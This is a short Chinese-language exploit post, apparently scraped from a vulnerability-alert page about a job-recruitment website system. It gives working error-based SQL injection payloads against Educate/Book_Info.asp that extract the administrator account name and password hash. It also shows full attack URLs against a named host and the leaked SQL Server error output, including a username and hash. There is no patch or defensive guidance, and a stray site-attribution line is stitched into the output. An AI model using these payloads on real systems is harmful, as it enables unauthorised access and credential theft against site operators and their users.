漏洞出现在Educate/Book_Info.asp
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
exp:如下
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误,
网络求职招聘人才网站系统正式版漏洞漏洞预警
,电脑资料
《网络求职招聘人才网站系统正式版漏洞漏洞预警》(https://www.unjs.com)。/Educate/Book_Info.asp,行 8
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
/Educate/Book_Info.asp,行 8